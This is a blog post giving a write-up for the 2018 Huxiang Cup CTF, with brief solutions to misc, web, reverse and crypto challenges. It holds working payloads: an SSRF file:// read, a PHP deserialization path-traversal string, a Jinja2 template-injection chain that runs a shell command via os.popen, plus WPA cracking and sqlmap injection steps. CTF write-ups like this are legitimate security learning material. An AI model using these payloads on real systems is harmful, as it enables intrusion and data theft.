2018湖湘杯writeup

最新推荐文章于 2024-04-21 10:46:28 发布
最新推荐文章于 2024-04-21 10:46:28 发布
阅读量3.5k 收藏 4
点赞数 1
分类专栏: 安全学习总结

 

  1. 题目名MISC Disk

解题思路、相关代码和Flag截图:

010Editor下查看,flag is not here分析a.d.s后二进制,提取出来,发现

01100110

01101100

01100001

01100111

01

 

11101100

11010001

00010001

01001101

01

 

11110011

00010110

11100101

11110100

01

 

00001100

01011100

11011010

11011111

01

第一块出来flag字样,后面拼接放入convert,解出后面字段。

得出flag{4DS_1n_D1sk}

 

  1. 题目名MISC FLOW

解题思路、相关代码和Flag截图:

解题思路原理:

1.aircrack-ng ctf.pcap -w mima.txt跑出密码password1

2.airdecap-ng ctf.pcap -e ctf -p password1   ESSID为CTF,输出ctf-dec.pcap

搜索flag得到答案

  1. 题目名Read flag

解题思路、相关代码和Flag截图:

访问显示;ssrf me with parameter 'url',因此需要构造url=?,通过分析ssrf漏洞发现该服务器对协议没有限制,使用bp爆破,发现可以用file协议。

       构造payload:http://47.107.237.27/?url=file:///var/www/html/ssrf/flag

  1. 题目名MyNote

解题思路、相关代码和Flag截图:

注册登录账号,上传图片,抓包,发现Picture=经过base64解码为反序列化字符串,修改其中的上传图片11.jpg,可以读取到flag

改a:1:{i:0;s:6:"11.jpg";}为a:1:{i:0;s:36:"../../../../../var/www/html/flag.php";},读取flag,转base64提交

 

得到Base64内容,解密得出来flag

  1. 题目名web XmeO

解题思路、相关代码和Flag截图:

尝试登录admin 密码admin登录成功,add添加如下payload,点击show出flag

{{ "".__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.func_globals.get('linecache').os.popen('ls /home/XmeO/test.db').read() }}

 

 

  1. 题目名Hidden Write

解题思路、相关代码和Flag截图:

首先使用010editor分离出三张图片,使用zsteg,解出部分flag,https://github.com/zed-0xff/zsteg

在使用BlindWaterMark-master提取盲水印图片,

https://github.com/chishaxie/BlindWaterMark

拼接出flag:hxb2018{b03bca1dbca1662e632ffa5bbefe4a50}

  1. 题目名Replace

解题思路、相关代码和Flag截图:

发现题目有壳:

使用kali下的upx脱壳工具脱壳

 

使用IDA打开程序发现关键代码check函数,check函数返回值为1,即可得。

在IDA中找到关键的d1和d2,值为下图。

脚本运行结果如下:

flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}

 

  1. 题目名:Common Crypto

解题思路、相关代码和Flag截图:

题目需要输入一个flag,然后一个字符串比较验证,动态调试跟进第一个sub_140001000函数,发现里面进行这一些赋值的操作,而且调用了一个数组,发现是一个aes盒,确定是AES加密

发现字符和49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad677
86e21d5ad比较,可以确定,此段就是我们要找的key,直接解密待比较的字符串的前32个字节即可

得到flag:hxb2018{3d39929451ee66ab1658c073}放到程序里面验证正确:

  1. 题目名 code check

首页公告链接:

http://39.108.176.234:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09怀疑存在注入,id有加密

http://39.108.176.234:49882/news/目录下存在:list.zip,里面有id的加密

 

加密方法为先AES,再两次base64

编写tamper

 

sqlmap注入得到flag:hxb2018{14ef3bd9a833a50b7ae24bbb0e4d57c8}

 

 

 

lycnjupt
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
2023 强网 Writeup
01-29
2023 强网 Writeup 是一篇关于 Capture The Flag(CTF)的 writeup,内容涵盖了多个挑战题目,涉及到 Python、 Cryptography、Reverse Engineering、Web 等多个领域。下面是对每个挑战题目的详细分析和知识点总结...
2019美亚writeup
03-26
本资源摘要信息来自2019美亚writeup,内容涉及电子数据取证大赛的相关检材和试题等。电子数据取证大赛是一项测试电子数据取证和分析能力的比赛,参赛者需要对提供的镜像文件进行分析,回答相关问题。 本资源摘要...
湖湘 MISC FLOW WP
qq_41183944的博客
11-19 330
下载文件,Wireshark的打开 发现与路由有关协议 接下来,破解无线网获取的数据包,使用自建字典暴力破解 密码为密码1 irdecap-ng ctf.cap -e etr -p password1获取数据包 搜索flag   ...
2018湖湘海选复赛Writeup
热门推荐
qq_35405259的博客
11-19 1万+
2018湖湘海选复赛Writeup0x01 签到题0x02 MISC Flow0x03 WEB Code Check0x04 WEB Readflag0x05 WEB XmeO0x06 Reverse Replace0x07 MISC Disk0x08 Crypto Common Crypto0x09 Reverse HighwayHash640x10 Web Mynot 0x0...
CTF java盲水印BlindWatermark工具 使用 编译jar包教程
最新发布
qq_51532711的博客
04-21 562
选择入口函数 Main Class选择META-INF所在文件夹点击OK Apply保存。
CTF 湖湘 2018 WriteUp (部分)
weixin_33804990的博客
11-25 335
湖湘 2018 WriteUp (部分),欢迎转载,转载请注明出处https://www.cnblogs.com/iAmSoScArEd/p/10016564.html! 1、 CodeCheck(WEB) 测试admin ‘ or ‘1’=’1’# ,php报错。点击登录框下面的滚动通知,URL有id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZz09,想到注入,但是不...
湖湘2018】第一次写wp就写个贼水的吧。。。
KingJerry的博客
11-19 641
昨天去考英语六级口语然后在外面浪一天,然后突然想起来好像有个比赛23333333 匆匆忙忙赶回来已经迟了。。。 行吧。。。   1、题目名 Welcome   关注公众号回复可得flag   2、题目名Disk  先用FTK扫描文件   发现四个flag文件将所有二进制复制下来 01100110011011000110000101100111011110110011...
攻防世界(view_source)
weixin_53857152的博客
12-22 489
攻防世界小白攻略 view_source 难度系数: 题目来源: Cyberpeace-n3k0 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目场景: ![在这里插入图片描述](https://img-blog.csdnimg.cn/20201222111652370.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZ
i春秋web-1
小白的劝退之路
10-16 980
MISC web 爆破-1 两个’/‘之间的符号是正则表达式,’^’ 表示匹配开始,‘$’匹配结束,‘\w‘表示匹配字母或数字或下划线或汉字,‘*’表示匹配前面的字符0次或多次,使用PHP的 $GLOBALS变量即可 MISC web 爆破-2 不在变量,就是在文件,使用file()或者file_get_contents()或者‘);‘’ ...
网鼎writeup-护网先锋1
08-04
3、得到 flag,截图如下图所示: 1、查看源代码可以发现存在代码泄露,代码如下: 2、在 get 使用.可以绕过第一个判断 3、使用.@c7f.zhuqu
强网 WriteUp By Nu1L
08-02
2022第六届“强网”全国网络安全挑战赛
BlindWaterMark.zip 盲水印
03-27
可以用来制作带盲水印的图片,也可以把盲水印从图片搞出来 这个程序是PYTHON写的,理论上WINDOWS和LINUX都可以运行 内附使用说明
2017湖湘pwn100的题目
11-30
2017湖湘pwn100的题目的二进制文件和libc的二进制文件
CTF——攻防世界第一篇01
qq_46555032的博客
04-10 1751
CTF——攻防世界第一篇 昨天下午看了关于ctf的视频,发现自己什么也不懂,明明每个字都是我认识的文,但是组合到一起就不明白了。「我好难……」 而且,看视频我似乎没什么的耐性,一下午下来还是发现自己没学到什么。所以,今天,我决定刷题,在刷题的过程遇到问题,再去解决。 第一题 没错就是这一题,我丝毫看不懂,这可是第一题…… 然后,我就去百度了……很多人的方法都不一样啊,简单的解法我弄不出来,...
湖湘2018
CODER的博客
12-25 748
好吧我被打爆了。 补题记录 1.Flow emm流量分析做过类似的 但比赛的时候没做出来 aircrack 爆破密码:password1 //需要强一点的字典 参考:https://xz.aliyun.com/t/1972 这个教你怎么解密的 以前我只会用工具解密 解不出答案。。。 解密完重新打开一次文件 翻一下http协议的可以看到flag… ...
2020湖湘CTF选拔赛部分wp
../../../../../../../
11-02 1860
Misc Misc1 颜文字之谜 提示说颜文字夺走了flag,Wireshark打开流量包,发现了一串base64隐写编码 导出转换 (。・∀・)ノ゙嗨Hi~ (@_@;)(@_@;)(@_@;) (+_+)?(。>︿<)_θ(。>︿<)_θ o(* ̄▽ ̄*)ブ゜ <(^-^)>(╯▽╰ )好香~~ ヽ(✿゚▽゚)ノ(@^0^) (^^ゞΨ( ̄∀ ̄)Ψ*★,°*:.☆( ̄▽ ̄)/$:*.°★* 。 ~\(≧▽≦)/~o(^▽^)o(¬‿¬)(*≧︶≦))( ̄▽ ̄* )ゞ┳━┳(╯‵
2018湖湘杂项复现
HanGHhao的博客
11-21 400
1.Disk 首先使用winimage打开文件看到四个txt文件,右键提取出来   winhex打开文件看到这串数字 flag0   flag1   flag2   flag3   根据学长给的思路知道这是将十六进制数拼接成二进制数后的隐写,仔细看了一下这些数011001….果真啊!!! 哎,自己还是太菜了,居然没有看出来 最后将这些二进制数转换成字...
2018.11.18湖湘wp
uiop_uiop_uiop的博客
11-19 1454
1、签到 关注公众号,略。 2、HighwayHash64 根据题目名称以及里面的口算hash,结合着题目反汇编了解到这是一个hash算法,搜索得到哈希的源代码。 拖进ida里面,分析程序逻辑发现程序首先对输入的flag长度进行了一次hash验证需要等于一个16位hash,之后又对花括号当的数字进行了hash验证,不成功就return 1。既然是一个hash算法,应该只有爆破了吧。先把长...
攻防世界 misc新手区 SimpleRAR wp
mastergu2的博客
06-03 901
第一次写这个wp…主要是这个题实在很复杂 首先下载文件,发现是个压缩包,解压得到一个叫做flag的文本,不出意料,点开啥也没有。 研究了半天发生啥也不懂,查阅资料发现,原来问题出在压缩包上。 使用winhex打开压缩包,如图所示 可以一眼看到这里有个flag is not here ,这个就是刚刚文本的内容。再瞟一眼好像看到有个其他的文件混进去了:secret.png 所以之所以没显示出来的原因大概是文件头有损坏的关系,需要注意的是,如果压缩包文件有损坏的情况,据说,打开损坏的压缩包的时候,winrar是
陇剑writeup
07-28
然而,你的问题是关于"陇剑writeup",但是在提供的引用内容并没有提到这个问题的相关信息。请提供更多的上下文或明确你的问题,以便我能够为你提供更准确的答案。 #### 引用[.reference_title] - *1* *2* *3* [...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值